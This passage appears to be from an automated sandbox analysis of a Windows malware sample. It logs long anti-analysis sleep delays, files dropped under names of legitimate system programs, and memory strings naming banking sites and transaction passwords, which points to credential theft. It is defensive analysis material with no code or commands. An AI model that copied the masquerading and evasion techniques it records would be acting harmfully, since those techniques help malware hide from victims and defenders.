                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596672Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596547Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596436Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596327Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596213Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596109Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596000Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595879Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595750Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595641Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595516Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595391Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595269Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595141Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595031Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594922Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594804Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594688Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594554Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594342Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594234Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594125Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594016Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593891Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593771Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593641Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593516Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593406Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593238Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593100Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 300000Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592928Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592797Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592672Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592552Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592422Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592307Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592181Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591946Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591827Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591700Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591563Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591438Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591328Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591219Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591089Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWindow / User API: threadDelayed 4019Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeWindow / User API: threadDelayed 5576Jump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeDropped PE file which has not been started: C:\Users\user\Desktop\AHphtSeX.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeDropped PE file which has not been started: C:\Users\user\Desktop\jjSkKJFG.logJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeDropped PE file which has not been started: C:\Users\user\Desktop\PDlWdMMS.logJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeDropped PE file which has not been started: C:\Users\user\Desktop\wlyrJHCD.logJump to dropped file
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeDropped PE file which has not been started: C:\Users\user\Desktop\rUKsZmvt.logJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeDropped PE file which has not been started: C:\Users\user\Desktop\YPnuykix.logJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeDropped PE file which has not been started: C:\Users\user\Desktop\FUSHtkHk.logJump to dropped file
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeDropped PE file which has not been started: C:\Users\user\Desktop\CUcqaUVf.logJump to dropped file
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe TID: 7736Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 5480Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -600000s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -599871s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -599025s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -598891s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -598688s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7976Thread sleep time: -21600000s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -598562s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -598438s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -598313s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -598199s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -598088s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -597782s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -597516s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -597227s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -597101s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -596983s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -596780s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -596672s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -596547s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -596436s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -596327s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -596213s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -596109s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -596000s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -595879s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -595750s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -595641s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -595516s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -595391s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -595269s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -595141s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -595031s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -594922s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -594804s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -594688s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -594554s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -594342s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -594234s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -594125s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -594016s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -593891s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -593771s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -593641s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -593516s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -593406s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -593238s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -593100s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7976Thread sleep time: -300000s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -592928s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -592797s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -592672s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -592552s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -592422s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -592307s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -592181s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -591946s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -591827s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -591700s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -591563s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -591438s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -591328s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -591219s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7804Thread sleep time: -591089s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe TID: 7488Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe TID: 7268Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe TID: 3192Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe TID: 736Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe TID: 2112Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe TID: 5808Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe TID: 7988Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeCode function: 17_2_00007FF7C17D7088 GetSystemInfo,17_2_00007FF7C17D7088
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 599871Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 599025Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598891Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598688Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 3600000Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598562Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598438Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598313Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598199Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 598088Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 597782Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 597516Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 597227Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 597101Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596983Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596780Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596672Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596547Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596436Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596327Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596213Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596109Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 596000Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595879Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595750Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595641Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595516Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595391Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595269Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595141Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 595031Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594922Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594804Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594688Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594554Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594342Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594234Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594125Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 594016Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593891Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593771Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593641Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593516Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593406Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593238Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 593100Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 300000Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592928Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592797Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592672Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592552Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592422Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592307Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 592181Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591946Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591827Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591700Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591563Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591438Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591328Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591219Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 591089Jump to behavior
                              Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeFile opened: C:\Users\userJump to behavior
                              Source: vbwUCvifDl.17.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                              Source: vbwUCvifDl.17.drBinary or memory string: tasks.office.comVMware20,11696501413o
                              Source: vbwUCvifDl.17.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                              Source: vbwUCvifDl.17.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                              Source: vbwUCvifDl.17.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                              Source: vbwUCvifDl.17.drBinary or memory string: dev.azure.comVMware20,11696501413j
                              Source: vbwUCvifDl.17.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                              Source: upfc.exe, 00000011.00000002.2529956937.000000001B810000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
                              Source: vbwUCvifDl.17.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                              Source: vbwUCvifDl.17.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                              Source: vbwUCvifDl.17.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                              Source: vbwUCvifDl.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                              Source: vbwUCvifDl.17.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                              Source: vbwUCvifDl.17.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                              Source: vbwUCvifDl.17.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
